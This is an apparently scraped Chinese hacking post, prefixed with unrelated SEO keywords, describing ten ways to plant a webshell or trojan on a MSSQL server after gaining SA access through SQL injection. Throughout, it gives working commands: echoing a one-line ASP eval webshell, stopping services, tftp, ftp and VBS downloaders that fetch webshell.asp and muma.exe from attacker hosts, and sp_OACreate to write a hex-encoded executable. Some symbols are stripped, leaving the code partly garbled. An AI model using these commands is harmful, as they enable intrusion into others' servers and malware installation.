做网站的作用,广告投放需要什么资质,wordpress 前台编辑,网站建设环境刚看了一种方法#xff0c;如果是注入点#xff0c;利用管中窥豹以二进制的方式上传#xff0c;上传的时候最好改下名#xff0c;比如do.exe#xff0c;上传到目标服务器可以改成do.cmd#xff0c;等传上去之后用copy 命令改回来。
当然用啊d也可以上传#xff0c;还有…刚看了一种方法如果是注入点利用管中窥豹以二进制的方式上传上传的时候最好改下名比如do.exe上传到目标服务器可以改成do.cmd等传上去之后用copy 命令改回来。
当然用啊d也可以上传还有nbsi。
SA 权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。
一、NBSI的命令方法:写入一句话木SHELL,命令如下 echo ^%eval request(#)%^ d:/web/mm.asp这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop 服务名可以停掉服务。
二、NBSI3。0自带文件上传功能也可以使用。缺点速度慢。建议上传短小的WEBSHELL。
三、把一句话木马与入数据库然后利用NBSI数据库差异备份功能。
四、如网站有论坛且开放上传附件功能可直接在论坛上传文件把WEBSHELL改成可能上传的文件类型如JPGGIF
五、利用NBSI等注入工具浏览网站数据库连接文件前提数据库和WEB在一台机器上可利用IPCNFIG /ALL命令判断找出SA的连接密码。利用MSSQL2000自带的事件查询分析器连数库机器通过浏览数据库找出后台密码如果是MD5可利用 UPDATE语句进行更改也可利用INSERT加入一新用户不用在爆破MD5进入后台寻找上传WEBSHELL方法。
六、tftp命令法 TFTP [-i] host [GET | PUT] source [destination] 首先在自己的机器或已经控制的肉鸡上开TFTP服务工具TFTP32.EXE不错。比如肉鸡 IP192.168.1.1 具有SA权限的机器是192.168.1.2 执行命令: tftp -i 192.168.1.1 get webshell.asp d:/web/webshell.asp 如果成功,就会在192.168.1.2的D盘web 目录下生成文件:webshell.asp
七、ftp方法:前提是有一个可访问的外网FTP空间().命令ECHO命令,前面讲的方法:在目标机器上生成文件ftp.txtecho open www.ftp.comftp.TXT //连接FTPecho usernameftp.TXT //输入用户名echo passwordftp.TXT //输入密码echo get webshell.asp d:/web/webshell.aspftp.TXT //执行下载命令echo byeftp.TXT //退出ftp -s:ftp.txt //执行FTP.TXT文件中的FTP命令
八、vbs脚本方法:利用ECHO命令写入文件: get.vbs,内容如下:On Error Resume NextDim iRemote,iLocaliLocal LCase(WScript.Arguments(1))iRemote LCase(WScript.Arguments(0))Set xPost createObject(Microsoft.XMLHTTP)xPost.Open GET,iRemote,0xPost.Send()Set sGet createObject(ADODB.Stream)sGet.Mode 3sGet.Type 1sGet.Open()sGet.Write(xPost.responseBody)sGet.SaveToFile iLocal,2然后命令行下执行:cscript get.vbs http://ip/muma.exe c:/muma.exe
九、start命令法此方法不常用但也是一种方法start http://ip/a.html这候a.html文件以及它包括的图片会保存在机器的如果我们把自己的程序改名为a.jpg嵌套在a.html中这时候可以下载到IE缓存中。可以利用dir /s a*.jpg进行搜索。如搜索到可以利用COPY命令复制出来。
十、自然找到了一种方法很好用。
第一步先恢复
exec sp_configure show advanced options,1 reconfigure exec sp_configure Ole Automation Procedures,1 reconfigure
第二步
DECLARE ObjectToken INT
EXEC sp_OACreate ADODB.Stream, ObjectToken OUTPUT
EXEC sp_OASetProperty ObjectToken, Type, 1
EXEC sp_OAMethod ObjectToken, Open
EXEC sp_OAMethod ObjectToken, Write, NULL, 0x
EXEC sp_OAMethod ObjectToken, SaveToFile, NULL, mssql.exe, 2 把16进制恢复exe 名字为 mssql
EXEC sp_OAMethod ObjectToken, Close
EXEC sp_OADestroy ObjectToken
go
mssql.exe需要十六进制转换。用了一段vbs代码如下。
On Error Resume NextFilePath Wscript.Arguments(0)FieName Right(FilePath, Len(FilePath) - InStrRev(FilePath, /))With CreateObject(Adodb.Stream).Type 1: .open: .loadfromfile FilePath: Str .read: Sl LenB(Str)End With
Sll Sl Mod 65536: Slh Sl / 65536With CreateObject(Scripting.FileSystemObject).OpenTextFile(FilePath .txt, 2, True).Write 0xFor i 1 To Slbt AscB(MidB(Str, i, 1))If bt 16 Then .Write 0.Write Hex(bt)NextEnd With
用法 1.vbs 1.exe
转自http://www.cqzh.cn/post/SA上传方法.html
